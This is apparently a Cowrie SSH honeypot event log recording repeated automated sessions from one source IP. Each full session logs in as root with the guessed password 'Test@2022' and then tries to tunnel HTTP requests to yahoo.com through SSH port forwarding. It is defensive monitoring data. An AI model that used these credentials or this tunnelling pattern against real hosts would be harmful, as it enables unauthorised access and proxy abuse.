{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:17.503988Z","src_ip":"213.209.150.239","session":"7fc666d47620"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":17826,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:17826","sensor":"my-vps","timestamp":"2025-08-26T01:00:17.659068Z","session":"7fc666d47620"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:17.715779Z","src_ip":"213.209.150.239","session":"7fc666d47620"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:17.774466Z","src_ip":"213.209.150.239","session":"7fc666d47620"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7967,"dst_ip":"1.2.3.4","dst_port":22,"session":"499c4c0aa8c5","protocol":"ssh","message":"New connection: 213.209.150.239:7967 (1.2.3.4:22) [session: 499c4c0aa8c5]","sensor":"my-vps","timestamp":"2025-08-26T01:00:17.820285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:17.821498Z","src_ip":"213.209.150.239","session":"499c4c0aa8c5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:17.869042Z","src_ip":"213.209.150.239","session":"499c4c0aa8c5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:18.104456Z","src_ip":"213.209.150.239","session":"499c4c0aa8c5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":21783,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:21783","sensor":"my-vps","timestamp":"2025-08-26T01:00:18.152690Z","session":"499c4c0aa8c5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:18.199964Z","src_ip":"213.209.150.239","session":"499c4c0aa8c5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":30427,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:30427","sensor":"my-vps","timestamp":"2025-08-26T01:00:18.337677Z","session":"499c4c0aa8c5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:18.386026Z","src_ip":"213.209.150.239","session":"499c4c0aa8c5"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:18.435300Z","src_ip":"213.209.150.239","session":"499c4c0aa8c5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8003,"dst_ip":"1.2.3.4","dst_port":22,"session":"87e912df129b","protocol":"ssh","message":"New connection: 213.209.150.239:8003 (1.2.3.4:22) [session: 87e912df129b]","sensor":"my-vps","timestamp":"2025-08-26T01:00:18.490882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:18.492058Z","src_ip":"213.209.150.239","session":"87e912df129b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:18.548864Z","src_ip":"213.209.150.239","session":"87e912df129b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:18.831737Z","src_ip":"213.209.150.239","session":"87e912df129b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":23316,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:23316","sensor":"my-vps","timestamp":"2025-08-26T01:00:18.890046Z","session":"87e912df129b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:18.947790Z","src_ip":"213.209.150.239","session":"87e912df129b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":25698,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:25698","sensor":"my-vps","timestamp":"2025-08-26T01:00:19.103184Z","session":"87e912df129b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:19.160028Z","src_ip":"213.209.150.239","session":"87e912df129b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:19.217412Z","src_ip":"213.209.150.239","session":"87e912df129b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8060,"dst_ip":"1.2.3.4","dst_port":22,"session":"e41afb50ed9f","protocol":"ssh","message":"New connection: 213.209.150.239:8060 (1.2.3.4:22) [session: e41afb50ed9f]","sensor":"my-vps","timestamp":"2025-08-26T01:00:19.273068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:19.273729Z","src_ip":"213.209.150.239","session":"e41afb50ed9f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:19.330320Z","src_ip":"213.209.150.239","session":"e41afb50ed9f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:19.613852Z","src_ip":"213.209.150.239","session":"e41afb50ed9f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":26206,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:26206","sensor":"my-vps","timestamp":"2025-08-26T01:00:19.671572Z","session":"e41afb50ed9f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:19.728342Z","src_ip":"213.209.150.239","session":"e41afb50ed9f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":11520,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:11520","sensor":"my-vps","timestamp":"2025-08-26T01:00:19.883082Z","session":"e41afb50ed9f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:19.940015Z","src_ip":"213.209.150.239","session":"e41afb50ed9f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:19.997588Z","src_ip":"213.209.150.239","session":"e41afb50ed9f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8103,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2f37c230cf9","protocol":"ssh","message":"New connection: 213.209.150.239:8103 (1.2.3.4:22) [session: d2f37c230cf9]","sensor":"my-vps","timestamp":"2025-08-26T01:00:20.043950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:20.044868Z","src_ip":"213.209.150.239","session":"d2f37c230cf9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:20.092605Z","src_ip":"213.209.150.239","session":"d2f37c230cf9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:20.328326Z","src_ip":"213.209.150.239","session":"d2f37c230cf9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":15415,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:15415","sensor":"my-vps","timestamp":"2025-08-26T01:00:20.376316Z","session":"d2f37c230cf9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:20.423633Z","src_ip":"213.209.150.239","session":"d2f37c230cf9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":28983,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:28983","sensor":"my-vps","timestamp":"2025-08-26T01:00:20.561659Z","session":"d2f37c230cf9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:20.608963Z","src_ip":"213.209.150.239","session":"d2f37c230cf9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:20.656927Z","src_ip":"213.209.150.239","session":"d2f37c230cf9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8146,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc96cd0bed81","protocol":"ssh","message":"New connection: 213.209.150.239:8146 (1.2.3.4:22) [session: cc96cd0bed81]","sensor":"my-vps","timestamp":"2025-08-26T01:00:20.712591Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:20.713453Z","src_ip":"213.209.150.239","session":"cc96cd0bed81"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:20.770095Z","src_ip":"213.209.150.239","session":"cc96cd0bed81"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:21.052031Z","src_ip":"213.209.150.239","session":"cc96cd0bed81"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":15181,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:15181","sensor":"my-vps","timestamp":"2025-08-26T01:00:21.109863Z","session":"cc96cd0bed81"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:21.166617Z","src_ip":"213.209.150.239","session":"cc96cd0bed81"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":4147,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:4147","sensor":"my-vps","timestamp":"2025-08-26T01:00:21.322965Z","session":"cc96cd0bed81"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:21.379573Z","src_ip":"213.209.150.239","session":"cc96cd0bed81"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:21.437500Z","src_ip":"213.209.150.239","session":"cc96cd0bed81"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8209,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f04811ed48b","protocol":"ssh","message":"New connection: 213.209.150.239:8209 (1.2.3.4:22) [session: 3f04811ed48b]","sensor":"my-vps","timestamp":"2025-08-26T01:00:21.483993Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:21.484855Z","src_ip":"213.209.150.239","session":"3f04811ed48b"}
